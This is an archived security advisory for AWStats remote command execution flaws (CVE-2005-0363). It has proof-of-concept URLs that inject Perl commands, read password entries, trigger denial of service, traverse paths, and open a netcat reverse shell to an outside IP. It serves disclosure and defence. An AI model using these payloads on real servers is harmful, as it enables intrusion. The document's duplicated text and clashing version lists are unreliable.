AWStats Plugin Multiple Remote Command Execution Vulnerabilities
BID:12543
Info
AWStats Plugin Multiple Remote Command Execution Vulnerabilities
| Bugtraq ID: | 12543 |
| Class: | Design Error |
| CVE: |
CVE-2005-0363 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 14 2005 12:00AM |
| Updated: | Jul 12 2009 10:06AM |
| Credit: | GHC <[email protected]> is credited with the disclosure of this issue. |
| Vulnerable: |
AWStats AWStats 6.3 AWStats AWStats 6.2 AWStats AWStats 6.1 AWStats AWStats 6.0 AWStats AWStats 5.9 AWStats AWStats 5.8 AWStats AWStats 5.7 AWStats AWStats 5.6 AWStats AWStats 5.5 AWStats AWStats 5.4 AWStats AWStats 5.3 AWStats AWStats 5.2 AWStats AWStats 5.1 AWStats AWStats 5.0 AWStats AWStats 4.0 AWStats AWStats 6.5.0 build 1.857 |
| Not Vulnerable: |
AWStats AWStats 6.3 AWStats AWStats 5.6 AWStats AWStats 6.5.0 build 1.857 |
Discussion
AWStats Plugin Multiple Remote Command Execution Vulnerabilities
Multiple remote command execution vulnerabilities reportedly affect AWStats. These issues are due to an input validation error that allows a remote attacker to specify commands to be executed in the context of the affected application.
The first problem presents itself due to the potential of malicious use of the 'loadplugin' and 'pluginmode' parameters of the 'awstats.pl' script. The second issue arises from an insecure implementation of the 'loadplugin' parameter functionality.
An attacker may leverage these issues to execute arbitrary commands with the privileges of the affected web server running the vulnerable scripts. This may facilitate unauthorized access to the affected computer, as well as other attacks.
Multiple sources have reported that AWStats 6.3 and subsequent versions are not vulnerable to these issues.
Multiple remote command execution vulnerabilities reportedly affect AWStats. These issues are due to an input validation error that allows a remote attacker to specify commands to be executed in the context of the affected application.
The first problem presents itself due to the potential of malicious use of the 'loadplugin' and 'pluginmode' parameters of the 'awstats.pl' script. The second issue arises from an insecure implementation of the 'loadplugin' parameter functionality.
An attacker may leverage these issues to execute arbitrary commands with the privileges of the affected web server running the vulnerable scripts. This may facilitate unauthorized access to the affected computer, as well as other attacks.
Multiple sources have reported that AWStats 6.3 and subsequent versions are not vulnerable to these issues.
Exploit / POC
AWStats Plugin Multiple Remote Command Execution Vulnerabilities
The following proof of concepts have been provided:
To execute arbitrary commands:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('id')+;
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
To trigger a denial of service condition:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep
To load the 'blib' Perl module:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
The following proof of concept was provided by <[email protected]>:
http://www.example.com/awstats/awstats.pl?pluginmode=:system http://xxx/awstats/awstats.pl?pluginmode=:system (?/bin/ls?);
The following proof of concept has been made available:
The following proof of concepts have been provided:
To execute arbitrary commands:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('id')+;
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
To trigger a denial of service condition:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep
To load the 'blib' Perl module:
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
The following proof of concept was provided by <[email protected]>:
http://www.example.com/awstats/awstats.pl?pluginmode=:system http://xxx/awstats/awstats.pl?pluginmode=:system (?/bin/ls?);
The following proof of concept has been made available:
Solution / Fix
AWStats Plugin Multiple Remote Command Execution Vulnerabilities
Solution:
Debian has released advisory DSA 682-1 to address these issues. Please see the referenced advisory for more information.
AWStats AWStats 4.0
Solution:
Debian has released advisory DSA 682-1 to address these issues. Please see the referenced advisory for more information.
AWStats AWStats 4.0
-
Debian awstats_4.0-0.woody.2_all.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0-0.w oody.2_all.deb
References
AWStats Plugin Multiple Remote Command Execution Vulnerabilities
References:
References:
- AWStats Homepage (AWStats)
- AWStats Vulnerability Analysis ([email protected])
- AWStats <= 6.4 Multiple vulnerabilities (GHC
- Re: AWStats <= 6.4 Multiple vulnerabilities (Ondra Holecek
- Re: AWStats <= 6.4 Multiple vulnerabilities (Laurent Destailleur
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? (Thom Craver
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? (Matt Wilder
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? (Herman Sheremetyev
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? (Jamie Pratt